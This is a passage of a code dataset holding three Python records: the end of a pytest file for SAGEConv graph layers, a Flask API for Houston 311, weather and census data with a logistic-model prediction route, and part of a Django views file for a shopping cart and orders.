0],\n ]\n )\n assert_allclose(dgl_methane.atom_features.detach().numpy(), expected_features)\n\n results = layer.forward(dgl_methane.homograph, dgl_methane.atom_features)\n results = results.detach().numpy()\n assert results.shape == (5, 3)\n assert_array_almost_equal(results, 0.952574)\n\n\nclass TestSageConv:\n @pytest.fixture()\n def sageconv_layer(self):\n layer = SAGEConv(\n in_feats=4,\n out_feats=3,\n aggregator_type=\"mean\",\n feat_drop=0,\n activation=torch.nn.Sigmoid(),\n bias=False,\n )\n\n layer.fc_neigh.weight.data.fill_(1.0)\n layer.fc_self.weight.data.fill_(2.0)\n return layer\n\n def test_forward_values_dgl(self, sageconv_layer, dgl_methane):\n expected_features = np.array(\n [\n [0, 0, 0, 1],\n [1, 0, 0, 0],\n [1, 0, 0, 0],\n [1, 0, 0, 0],\n [1, 0, 0, 0],\n ]\n )\n assert_allclose(dgl_methane.atom_features.detach().numpy(), expected_features)\n\n results = sageconv_layer.forward(\n dgl_methane.homograph, dgl_methane.atom_features\n )\n results = results.detach().numpy()\n assert results.shape == (5, 3)\n assert_array_almost_equal(results, 0.952574)\n\n def test_forward_values_dgl(self, sageconv_layer, nx_methane):\n expected_features = np.array(\n [\n [0, 0, 0, 1],\n [1, 0, 0, 0],\n [1, 0, 0, 0],\n [1, 0, 0, 0],\n [1, 0, 0, 0],\n ]\n )\n assert_allclose(nx_methane.atom_features.detach().numpy(), expected_features)\n\n results = sageconv_layer.forward(nx_methane.homograph, nx_methane.atom_features)\n results = results.detach().numpy()\n assert results.shape == (5, 3)\n assert_array_almost_equal(results, 0.952574)\n", "sub_path": "openff/nagl/tests/nn/gcn/test_sage.py", "file_name": "test_sage.py", "file_ext": "py", "file_size_in_byte": 5123, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "dgl.nn", "line_number": 14, "usage_type": "attribute"}, {"api_name": "openff.nagl.nn.gcn._sage.SAGEConv", "line_number": 16, "usage_type": "name"}, {"api_name": "openff.nagl.nn.gcn.SAGEConvStack.with_layers", "line_number": 21, "usage_type": "call"}, {"api_name": "openff.nagl.nn.gcn.SAGEConvStack", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.isclose", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.isclose", "line_number": 35, "usage_type": "call"}, {"api_name": "openff.nagl.nn.gcn.SAGEConvStack.with_layers", "line_number": 40, "usage_type": "call"}, {"api_name": "openff.nagl.nn.gcn.SAGEConvStack", "line_number": 40, "usage_type": "name"}, {"api_name": "openff.nagl.nn.activation.ActivationFunction.LeakyReLU", "line_number": 43, "usage_type": "attribute"}, {"api_name": "openff.nagl.nn.activation.ActivationFunction", "line_number": 43, "usage_type": "name"}, {"api_name": "numpy.isclose", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "attribute"}, {"api_name": "openff.nagl.nn.gcn.SAGEConvStack.with_layers", "line_number": 59, "usage_type": "call"}, {"api_name": "openff.nagl.nn.gcn.SAGEConvStack", "line_number": 59, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 72, "usage_type": "call"}, {"api_name": "openff.nagl.nn.gcn.SAGEConvStack.with_layers", "line_number": 73, "usage_type": "call"}, {"api_name": "openff.nagl.nn.gcn.SAGEConvStack", "line_number": 73, "usage_type": "name"}, {"api_name": "pytest.importorskip", "line_number": 82, "usage_type": "call"}, {"api_name": "dgl.nn.pytorch.SAGEConv", "line_number": 83, "usage_type": "call"}, {"api_name": "dgl.nn", "line_number": 83, "usage_type": "attribute"}, {"api_name": "torch.nn.Sigmoid", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 88, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 109, "usage_type": "call"}, {"api_name": "openff.nagl.nn.gcn._sage.SAGEConv", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.nn.Sigmoid", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 162, "usage_type": "call"}]}
+{"seq_id": "575702570", "text": "# Docs on session basics\n\nimport numpy as np\nimport pandas as pd\nimport os\nimport sys\nimport pickle\nfrom collections import OrderedDict\n\nfrom flask import Flask, jsonify\n#from flask_cors import CORS, cross_origin\n\n\n#################################################\n# read data from the csv files\n#################################################\n\n# print(pd.show_versions(), file=sys.stderr)\n# Save reference to the table\nweatherData = pd.read_csv(\"static/data/selected_weather_data_for_visual.csv\")\naggData = pd.read_csv(\"static/data/agg_hist_311_data.csv\")\ncensusData = pd.read_json(\"static/data/census_data.json\")\nweatherData['date_field_str'] = weatherData['date_field_str'].astype('str')\nweatherData['yr'] = weatherData['yr'].astype('str')\ncensusData['zipcode'] = censusData['Zipcode'].astype('str')\naggData['zipcode'] = aggData['zipcode'].astype('str')\naggData['yr'] = aggData['yr'].astype('str')\naggData['date_field_str'] = aggData['date_field_str'].astype('str')\n# aggData['date_field'] = aggData['date_field'].dt.date\n\n# month = dict(one='January',\n# two='February',\n# three='March',\n# four='April',\n# five='May',\n# six='June',\n# seven='July',\n# eight='August',\n# nine='September',\n# ten='October',\n# eleven='November',\n# twelve='December'\n# )\n# monthShort = dict(one='Jan',\n# two='Feb',\n# three='Mar',\n# four='Apr',\n# five='May',\n# six='Jun',\n# seven='Jul',\n# eight='Aug',\n# nine='Sep',\n# ten='Oct',\n# eleven='Nov',\n# twelve='Dec'\n# )\n\nmonths = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']\nmonthsDict = {'Jan': 1,'Feb' : 2,'Mar': 3,'Apr': 4,'May': 5,'Jun': 6,'Jul': 7,'Aug': 8,'Sep': 9,'Oct': 10,'Nov': 11,'Dec': 12}\n\n\nprint(censusData.head(5), file=sys.stderr)\nprint(aggData.head(5), file=sys.stderr)\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n#cors = CORS(app)\n#app.config['CORS_HEADERS'] = 'Content-Type'\n\n#################################################\n# Loaf Model\n#################################################\n\ndef load_model():\n global model\n with open('static/models/logistic_model.pkl', 'rb') as f:\n model = pickle.load(f)\n print(\"model loaded\")\n\n#################################################\n# Flask Routes\n#################################################\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n input_data = request.form.to_dict()\n data = process_input(input_data)\n value = model.predict(data)\n return render_template('index.html', result=value)\n\n return render_template('index.html')\n\n@app.route(\"/api/v1.0/weather/date/\")\ndef stateData(date_filter):\n \"\"\"Return a list of all weather for the state\"\"\"\n\n # Query all passengers\n weather_sel = weatherData[weatherData['date_field_str'] == str(date_filter).strip()]\n print('data in filter:'+ str(date_filter), file=sys.stderr)\n # close the session to end the communication with the database\n # Convert list of tuples into normal list\n# all_names = list(np.ravel(results))\n all_data = []\n # for weather, index in weather_sel:\n for index, weather in weather_sel.iterrows():\n weather_dict = {}\n weather_dict[\"date\"] = weather['date_field']\n weather_dict[\"tempMax\"] = weather['tempMax']\n weather_dict[\"tempMin\"] = weather['tempMin']\n weather_dict[\"tempAvg\"] = weather['tempAvg']\n weather_dict[\"precipitation\"] = weather['precipitation']\n\n all_data.append(weather_dict)\n\n return jsonify(all_data)\n\n\n@app.route(\"/api/v1.0/weather/dateRange//\")\ndef all_states(date_start, date_end):\n \"\"\"Return a list of all weather for the state\"\"\"\n\n # Query all passengers\n weather_sel = weatherData[weatherData['date_field_str'] >= date_start]\n weather_sel = weather_sel[weather_sel['date_field_str'] <= date_end]\n\n # close the session to end the communication with the database\n # Convert list of tuples into normal list\n# all_names = list(np.ravel(results))\n all_data = []\n # for weather, index in weather_sel:\n for index, weather in weather_sel.iterrows():\n weather_dict = {}\n weather_dict[\"date\"] = weather['date_field']\n weather_dict[\"tempMax\"] = weather['tempMax']\n weather_dict[\"tempMin\"] = weather['tempMin']\n weather_dict[\"tempAvg\"] = weather['tempAvg']\n weather_dict[\"precipitation\"] = weather['precipitation']\n all_data.append(weather_dict)\n\n return jsonify(all_data)\n\n@app.route(\"/api/v1.0/census/zipcode/\")\ndef zipCodeData(zipcode_filter):\n \"\"\"Return a list of all weather for the state\"\"\"\n\n # Query all passengers\n census_sel = censusData[censusData['zipcode'] == str(zipcode_filter).strip()]\n print('data in filter:'+ str(zipcode_filter), file=sys.stderr)\n # close the session to end the communication with the database\n # Convert list of tuples into normal list\n# all_names = list(np.ravel(results))\n all_data = []\n # for weather, index in weather_sel:\n for index, census in census_sel.iterrows():\n census_dict = {}\n census_dict[\"zipcode\"] = census['zipcode']\n census_dict[\"Population\"] = census['Population']\n census_dict[\"MedianAge\"] = census['Median Age']\n census_dict[\"HouseholdIncome\"] = census['Household Income']\n census_dict[\"PerCapitaIncome\"] = census['Per Capita Income']\n census_dict[\"PovertyRate\"] = census['Poverty Rate']\n census_dict[\"TotalHouseholds\"] = census['Total Households']\n census_dict[\"TotalOwnerOccupied\"] = census['Total Owner Occupied']\n census_dict[\"PerOwnerOccupied\"] = census['% Owner Occupied']\n\n all_data.append(census_dict)\n\n return jsonify(all_data)\n\n@app.route(\"/api/v1.0/getAllZipCodes\")\ndef getAllZipCodes():\n \"\"\"Return a list of all weather for the state\"\"\"\n\n allZips = aggData.zipcode.unique()\n\n return jsonify(allZips.tolist())\n\n@app.route(\"/api/v1.0/getAllTypes\")\ndef getAllTypes():\n \"\"\"Return a list of all weather for the state\"\"\"\n\n allServs = aggData.serv_type.unique()\n\n return jsonify(allServs.tolist())\n\n@app.route(\"/api/v1.0/getAllDates\")\ndef getAllDates():\n \"\"\"Return a list of all weather for the state\"\"\"\n\n allDates = aggData.date_field_str.unique()\n\n return jsonify(allDates.tolist())\n\n\n@app.route(\"/api/v1.0/getAllNeib\")\ndef getAllNeib():\n \"\"\"Return a list of all weather for the state\"\"\"\n\n allDates = aggData.neighborhood.unique()\n\n return jsonify(allDates.tolist())\n\n\n\n@app.route(\"/api/v1.0/houston311/zipcode/date/type///\")\ndef houston311byAll(zipcode_filter, date_filter, type_filter):\n \"\"\"Return a list of all weather for the state\"\"\"\n\n # Query all passengers\n agg_sel = aggData[aggData['zipcode'] == str(zipcode_filter).strip()]\n print('data in filter:'+ str(zipcode_filter), file=sys.stderr)\n agg_sel = agg_sel[agg_sel['date_field_str'] == str(date_filter).strip()]\n print('data in filter:'+ str(date_filter), file=sys.stderr)\n agg_sel = agg_sel[agg_sel['serv_type'] == str(type_filter).strip()]\n print('data in filter:'+ str(type_filter), file=sys.stderr)\n # close the session to end the communication with the database\n # Convert list of tuples into normal list\n# all_names = list(np.ravel(results))\n all_data = []\n # for weather, index in weather_sel:\n for index, census in agg_sel.iterrows():\n census_dict = {}\n census_dict[\"zipcode\"] = census['zipcode']\n census_dict[\"Population\"] = census['Population']\n census_dict[\"MedianAge\"] = census['Median Age']\n census_dict[\"HouseholdIncome\"] = census['Household Income']\n census_dict[\"PerCapitaIncome\"] = census['Per Capita Income']\n census_dict[\"PovertyRate\"] = census['Poverty Rate']\n census_dict[\"TotalHouseholds\"] = census['Total Households']\n census_dict[\"TotalOwnerOccupied\"] = census['Total Owner Occupied']\n census_dict[\"PerOwnerOccupied\"] = census['% Owner Occupied']\n\n all_data.append(census_dict)\n\n return jsonify(all_data)\n\n\n@app.route(\"/api/v1.0/houston311/top10Types\")\ndef houston311Top10():\n \"\"\"Return a list of all weather for the state\"\"\"\n aggTypes = aggData.groupby(['serv_type']).agg(\n # Get max of the duration column for each group\n count_issues=('serv_type', 'count')) \n aggTypes.reset_index(inplace=True)\n aggTypes.sort_values('count_issues',ascending=False,inplace=True)\n aggTypes = aggTypes.head(10)\n # close the session to end the communication with the database\n # Convert list of tuples into normal list\n# all_names = list(np.ravel(results))\n all_data = []\n # for weather, index in weather_sel:\n for index, row in aggTypes.iterrows():\n data_dict = {}\n data_dict[\"serv_type\"] = row.serv_type\n data_dict[\"count_issues\"] = row.count_issues\n\n all_data.append(data_dict)\n\n return jsonify(all_data)\n\n\n\n\n@app.route(\"/api/v1.0/houston311/ByMonth\")\ndef houston311top10ByMonth():\n \"\"\"Return a list of all weather for the state\"\"\"\n aggTypes = aggData.groupby(['date_month']).agg(\n # Get max of the duration column for each group\n count_issues=('serv_type', 'count')) \n weathAgg = weatherData.groupby(['date_month']).agg(\n prec=('precipitation', 'sum'),\n avg_max=('tempMax', 'mean'))\n\n aggTypes.reset_index(inplace=True)\n weathAgg.reset_index(inplace=True)\n \n # close the session to end the communication with the database\n # Convert list of tuples into normal list\n# all_names = list(np.ravel(results))\n all_data = []\n # for weather, index in weather_sel:\n for index, row in aggTypes.iterrows():\n data_dict = {}\n data_dict[\"date_month\"] = row.date_month\n data_dict[\"count_issues\"] = row.count_issues\n for index1, row1 in weathAgg.iterrows():\n if (row1.date_month == row.date_month):\n data_dict[\"prec\"] = row1.prec\n data_dict[\"avg_max\"] = row1.avg_max\n\n all_data.append(data_dict)\n\n return jsonify(all_data)\n\n\n@app.route(\"/api/v1.0/houston311/top10Types/zip//year//neib//type/\")\ndef houston311Top10byZip(zip_filter, year_filter, neib_filter, type_filter):\n \"\"\"Return a list of all weather for the state\"\"\"\n agg_sel = aggData\n if (zip_filter != 'ALL'):\n agg_sel = agg_sel[agg_sel['zipcode'] == str(zip_filter).strip()]\n if (year_filter != 'ALL'):\n agg_sel = agg_sel[agg_sel['yr'] == str(year_filter).strip()]\n if (neib_filter != 'ALL'):\n agg_sel = agg_sel[agg_sel['neighborhood'] == str(neib_filter).strip()]\n if (type_filter != 'ALL'):\n agg_sel = agg_sel[agg_sel['serv_type'] == str(type_filter).strip()]\n print('data in filter:'+ str(zip_filter), file=sys.stderr)\n# print('agg:'+ agg_sel.head(5), file=sys.stderr)\n aggTypes = agg_sel.groupby(['serv_type']).agg(\n # Get max of the duration column for each group\n count_issues=('serv_type', 'count')) \n aggTypes.reset_index(inplace=True)\n aggTypes.sort_values('count_issues',ascending=False,inplace=True)\n aggTypes = aggTypes.head(10)\n # close the session to end the communication with the database\n # Convert list of tuples into normal list\n# all_names = list(np.ravel(results))\n all_data = []\n # for weather, index in weather_sel:\n for index, row in aggTypes.iterrows():\n data_dict = {}\n data_dict[\"serv_type\"] = row.serv_type\n data_dict[\"count_issues\"] = row.count_issues\n\n all_data.append(data_dict)\n\n return jsonify(all_data)\n\n\n\n@app.route(\"/api/v1.0/houston311/ByMonth/zip//year//neib//type/\")\ndef houston311top10ByMonthZip(zip_filter, year_filter, neib_filter, type_filter):\n \"\"\"Return a list of all weather for the state\"\"\"\n agg_sel = aggData\n if (zip_filter != 'ALL'):\n agg_sel = agg_sel[agg_sel['zipcode'] == str(zip_filter).strip()]\n if (year_filter != 'ALL'):\n agg_sel = agg_sel[agg_sel['yr'] == str(year_filter).strip()]\n if (neib_filter != 'ALL'):\n agg_sel = agg_sel[agg_sel['neighborhood'] == str(neib_filter).strip()]\n if (type_filter != 'ALL'):\n agg_sel = agg_sel[agg_sel['serv_type'] == str(type_filter).strip()]\n\n print('data in filter:'+ str(zip_filter), file=sys.stderr)\n aggTypes = agg_sel.groupby(['date_month']).agg(\n count_issues=('serv_type', 'count'),\n time_taken=('avg_time', 'mean'),\n overdue=('avg_overdue', 'mean'))\n weath_sel = weatherData\n if (year_filter != 'ALL'):\n weath_sel = weatherData[weatherData['yr'] == str(year_filter).strip()]\n\n weathAgg = weath_sel.groupby(['date_month']).agg(\n prec=('precipitation', 'sum'),\n avg_max=('tempMax', 'mean'))\n\n aggTypes.reset_index(inplace=True)\n weathAgg.reset_index(inplace=True)\n # aggTypes.sort_values('count_issues',ascending=False,inplace=True)\n # aggTypes = aggTypes.head(10)\n # close the session to end the communication with the database\n # Convert list of tuples into normal list\n# all_names = list(np.ravel(results))\n all_data = []\n # for weather, index in weather_sel:\n for index, row in aggTypes.iterrows():\n data_dict = {}\n data_dict[\"sort_key\"] = monthsDict[row.date_month]\n data_dict[\"date_month\"] = row.date_month\n data_dict[\"count_issues\"] = row.count_issues\n data_dict[\"time_taken\"] = row.time_taken\n data_dict[\"overdue\"] = row.overdue\n for index1, row1 in weathAgg.iterrows():\n if (row1.date_month == row.date_month):\n data_dict[\"prec\"] = row1.prec\n data_dict[\"avg_max\"] = row1.avg_max\n\n all_data.append(data_dict)\n #OrderedDict(sorted(all_data.items(),key =lambda x:months.index(x[0])))\n all_data = sorted(all_data, key = lambda i: (i['sort_key'])) \n return jsonify(all_data)\n\n@app.route(\"/api/v1.0/processModel/zip//temp//rain//type/\")\ndef processModel(zip_filter, temp_entered, rain_entered, type_filter):\n \"\"\"Return a list of all weather for the state\"\"\"\n\n census_sel = censusData[censusData['zipcode'] == str(zip_filter).strip()]\n print('data in filter:'+ str(zip_filter), file=sys.stderr)\n # close the session to end the communication with the database\n # Convert list of tuples into normal list\n# all_names = list(np.ravel(results))\n all_data = []\n data_dict = {}\n\n for index, census in census_sel.iterrows():\n population = census['Population']\n MedianAge = census['Median Age']\n HouseholdIncome = census['Household Income']\n PovertyRate = census['Poverty Rate']\n PerOwnerOccupied = census['% Owner Occupied']\n data_dict['MedianAge'] = census['Median Age']\n data_dict['HouseholdIncome'] = census['Household Income']\n data_dict[\"Population\"] = census['Population']\n data_dict[\"PerCapitaIncome\"] = census['Per Capita Income']\n data_dict[\"PovertyRate\"] = census['Poverty Rate']\n data_dict[\"TotalHouseholds\"] = census['Total Households']\n data_dict[\"TotalOwnerOccupied\"] = census['Total Owner Occupied']\n data_dict[\"PerOwnerOccupied\"] = census['% Owner Occupied']\n\n # weather_sel = weatherData[weatherData['date_field_str'] == str(date_selected).strip()]\n # print('data in filter:'+ str(date_selected), file=sys.stderr)\n # for index, weather in weather_sel.iterrows():\n # tempAvg = weather['tempAvg']\n # precipitation = weather['precipitation']\n\n contProb = 0\n if (type_filter == 'Container Problem'):\n contProb = 1\n drainProb = 0\n if (type_filter == 'Drainage'):\n drainProb = 1\n missedGarbProb = 0\n if (type_filter == 'Missed Garbage Pickup'):\n missedGarbProb = 1\n missedHeavyProb = 0\n if (type_filter == 'Missed Heavy Trash Pickup'):\n missedHeavyProb = 1\n missedRecProb = 0\n if (type_filter == 'Missed Recycling Pickup'):\n missedRecProb = 1\n nuisProb = 0\n if (type_filter == 'Nuisance On Property'):\n nuisProb = 1\n smwProb = 0\n if (type_filter == 'SWM Escalation'):\n smwProb = 1\n sewerProb = 0\n if (type_filter == 'Sewer Wasterwater'):\n sewerProb = 1\n stormProb = 0\n if (type_filter == 'Storm Debris Collection'):\n stormProb = 1\n streetCondProb = 0\n if (type_filter == 'Street Condition'):\n streetCondProb = 1\n streetHazardProb = 0\n if (type_filter == 'Street Hazard'):\n streetHazardProb = 1\n traficSignalProb = 0\n if (type_filter == 'Traffic Signal Maintenance'):\n traficSignalProb = 1\n trafficSignProb = 0\n if (type_filter == 'Traffic Sign'):\n trafficSignProb = 1\n waterLeakProb = 0\n if (type_filter == 'Water Leak'):\n waterLeakProb = 1\n waterServiceProb = 0\n if (type_filter == 'Water Service'):\n waterServiceProb = 1\n\n \n# Population, Median Age, Household Income, Poverty Rate, % Owner Occupied, tempAvg, precipAvg, Container Problem, Drainage,\n# Missed Garbage Pickup, Missed Heavy Trash Pickup, Missed Recycling Pickup, Nuisance On Property, SWM Escalation, \n# Sewer Wasterwater, Storm Debris Collection, Street Condition,\n# Street Hazard, Traffic Signal Maintenance, Traffic Sign, Water Leak, Water Service\n\n new_data = [[population, MedianAge, HouseholdIncome, \n PovertyRate, PerOwnerOccupied, float(temp_entered), float(rain_entered),\n contProb, drainProb, missedGarbProb, missedHeavyProb, \n missedRecProb, nuisProb, smwProb, sewerProb, \n stormProb, streetCondProb, streetHazardProb, traficSignalProb, \n trafficSignProb, waterLeakProb, waterServiceProb]]\n\n # new_data_scaled = X_scaler.transform(new_data)\n\n new_predict = model.predict(new_data)\n print(new_predict, file=sys.stderr)\n data_dict['Prediction'] = str(new_predict[0])\n all_data.append(data_dict)\n print(all_data, file=sys.stderr)\n\n #OrderedDict(sorted(all_data.items(),key =lambda x:months.index(x[0])))\n # all_data = sorted(all_data, key = lambda i: (i['sort_key'])) \n return jsonify(all_data)\n\n\n\nif __name__ == '__main__':\n load_model()\n app.run(debug=True)\n", "sub_path": "backup/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 18786, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pandas.read_csv", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 62, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 63, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 68, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 79, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 103, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 144, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 152, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 172, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 180, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 188, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 196, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 205, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 215, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 217, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 219, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 239, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 263, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 297, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 312, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 332, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 349, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 386, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 393, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 483, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 486, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 490, "usage_type": "call"}]}
+{"seq_id": "411000732", "text": "from django.http import JsonResponse\r\nfrom django.shortcuts import render,HttpResponseRedirect\r\nfrom app.models import MainWheel,MainNav,MainMustBuy,MainShop,MainShow,FoodType,Goods,CartModel,OrderModel,OrderGoodsModel\r\nfrom user.models import UserModel, UserTicketModel\r\nfrom django.core.urlresolvers import reverse\r\n\r\nfrom utils.functions import get_order_random_id\r\n\r\n\r\ndef home(request):\r\n '''\r\n 首页视图函数\r\n '''\r\n if request.method == 'GET':\r\n mainwheels = MainWheel.objects.all()\r\n navs = MainNav.objects.all()\r\n mustbuys = MainMustBuy.objects.all()\r\n mainshops = MainShop.objects.all()\r\n mainshows = MainShow.objects.all()\r\n data = {\r\n 'title':'首页',\r\n 'mainwheel':mainwheels,\r\n 'mustbuys':mustbuys,\r\n 'navs':navs,\r\n 'mainshops':mainshops,\r\n 'mainshows':mainshows\r\n }\r\n return render(request,'home/home.html',data)\r\n\r\ndef mine(request):\r\n '''\r\n 个人中心\r\n '''\r\n if request.method == 'GET':\r\n user = request.user\r\n orders = OrderModel.objects.filter(user=user)\r\n payed , wait_pay = 0,0\r\n for order in orders:\r\n if order.o_status == 0:\r\n wait_pay += 1\r\n if order.o_status == 1:\r\n payed +=1\r\n\r\n data = {\r\n 'wait_pay':wait_pay,\r\n 'payed':payed\r\n }\r\n return render(request,'mine/mine.html',data)\r\n\r\ndef market(request):\r\n '''\r\n 闪购超市\r\n '''\r\n if request.method == 'GET':\r\n return HttpResponseRedirect(reverse('axf:params_market',args=('104749','0','0')))\r\n\r\ndef user_market(request,typeid,cid,sid):\r\n '''\r\n :param typeid: 分类id\r\n :param cid: 子分类id\r\n :param sid: 排序id\r\n '''\r\n if request.method == 'GET':\r\n ticket = request.COOKIES.get('ticket')\r\n user_ticket = UserTicketModel.objects.filter(ticket=ticket).first()\r\n if user_ticket:\r\n user = user_ticket.user\r\n else:\r\n user = ''\r\n # user = request.user\r\n foodtypes = FoodType.objects.all()\r\n if cid == '0':\r\n goods = Goods.objects.filter(categoryid=typeid)\r\n else:\r\n goods = Goods.objects.filter(categoryid=typeid,\r\n childcid=cid)\r\n foodtypes_current = foodtypes.filter(typeid=typeid).first()\r\n if foodtypes_current:\r\n childtypes = foodtypes_current.childtypenames\r\n childtypenames = childtypes.split('#')\r\n child_list = []\r\n for childtypename in childtypenames:\r\n child_type_info = childtypename.split(':')\r\n child_list.append(child_type_info)\r\n #排序\r\n if sid == '0':\r\n pass\r\n if sid == '1':\r\n goods = goods.order_by('productnum')\r\n if sid == '2':\r\n goods = goods.order_by('-price')\r\n if sid == '3':\r\n goods = goods.order_by('price')\r\n\r\n #返回购物车信息\r\n if user:\r\n user_cart = CartModel.objects.filter(user=user)\r\n else:\r\n user_cart = ''\r\n\r\n data = {\r\n 'foodtypes':foodtypes,\r\n 'goods':goods,\r\n 'typeid':typeid,\r\n 'child_list':child_list,\r\n 'cid':cid,\r\n 'user_cart':user_cart\r\n }\r\n return render(request,'market/market.html',data)\r\n\r\n\r\ndef add_cart(request):\r\n '''\r\n 添加购物车\r\n '''\r\n if request.method == 'POST':\r\n user = request.user\r\n goods_id = request.POST.get('goods_id')\r\n #判断用户是否是系统自带的anonymouseuser还是登陆的用户\r\n data = {\r\n 'code': 200,\r\n 'msg': '请求成功'\r\n }\r\n if user.id:\r\n user_carts = CartModel.objects.filter(user=user,goods_id=goods_id).first()\r\n if user_carts:\r\n user_carts.c_num += 1\r\n user_carts.save()\r\n data['c_num'] = user_carts.c_num\r\n else:\r\n CartModel.objects.create(user=user,goods_id=goods_id)\r\n data['c_num'] = 1\r\n carts = CartModel.objects.filter(user=user,is_select=True)\r\n price = 0\r\n for cart in carts:\r\n price = cart.goods.price * cart.c_num + price\r\n data['price'] = int(price)\r\n return JsonResponse(data)\r\n data['msg'] = '当前用户没有登录'\r\n return JsonResponse(data)\r\n\r\ndef sub_cart(request):\r\n '''\r\n 减少购物车用户下单商品的数量\r\n '''\r\n if request.method == 'POST':\r\n goods_id = request.POST.get('goods_id')\r\n user = request.user\r\n data = {\r\n 'msg':'请求成功',\r\n 'code':200\r\n }\r\n if user.id:\r\n #获取用户下单对应的商品信息\r\n user_carts = CartModel.objects.filter(user=user,goods_id=goods_id).first()\r\n #如果购物车中已经存在了商品信息\r\n if user_carts:\r\n if user_carts.c_num == 1 :\r\n user_carts.delete()\r\n data['c_num'] = 0\r\n else:\r\n user_carts.c_num -= 1\r\n data['c_num'] = user_carts.c_num\r\n user_carts.save()\r\n price = 0\r\n carts = CartModel.objects.filter(user=user, is_select=True)\r\n for cart in carts:\r\n price = cart.goods.price * cart.c_num + price\r\n data['price'] = int(price)\r\n return JsonResponse(data)\r\n data['c_num'] = 0\r\n return JsonResponse(data)\r\n data['msg'] = '该用户没有登录'\r\n data['code'] = '403'\r\n return JsonResponse(data)\r\n\r\ndef cart(request):\r\n if request.method == 'GET':\r\n user = request.user\r\n #查询购物车信息\r\n user_carts = CartModel.objects.filter(user=user)\r\n price = 0\r\n for carts in user_carts:\r\n if carts.is_select == True:\r\n price = carts.goods.price * carts.c_num + price\r\n data = {\r\n 'user_carts':user_carts,\r\n 'price':int(price)\r\n }\r\n return render(request,'cart/cart.html',data)\r\n\r\ndef change_select_status(request):\r\n if request.method == 'POST':\r\n user = request.user\r\n cart_id = request.POST.get('cart_id')\r\n cart = CartModel.objects.filter(id=cart_id).first()\r\n if cart.is_select:\r\n cart.is_select = False\r\n else:\r\n cart.is_select = True\r\n cart.save()\r\n g_carts = CartModel.objects.filter(user=user,is_select=True)\r\n price = 0\r\n for g_cart in g_carts:\r\n price = g_cart.goods.price * g_cart.c_num + price\r\n data = {\r\n 'code':200,\r\n 'msg':'请求成功',\r\n 'is_select':cart.is_select,\r\n 'price':int(price)\r\n }\r\n return JsonResponse(data)\r\n\r\ndef allcheck(request):\r\n if request.method == 'GET':\r\n user = request.user\r\n user_cart = CartModel.objects.filter(user=user)\r\n for cart in user_cart:\r\n cart.is_select = True\r\n cart.save()\r\n data = {\r\n 'code':200,\r\n 'msg':'请求成功',\r\n }\r\n return JsonResponse(data)\r\n\r\n\r\ndef generate_order(request):\r\n if request.method == 'GET':\r\n # 下单\r\n user = request.user\r\n # 创建订单\r\n o_num = get_order_random_id()\r\n order = OrderModel.objects.create(user=user,\r\n o_num=o_num)\r\n #选择勾选的商品进行下单\r\n user_carts = CartModel.objects.filter(user=user,is_select=True)\r\n for carts in user_carts:\r\n # 创建商品和订单之间的关系\r\n OrderGoodsModel.objects.create(goods=carts.goods,order=order,goods_num=carts.c_num)\r\n user_carts.delete()\r\n return 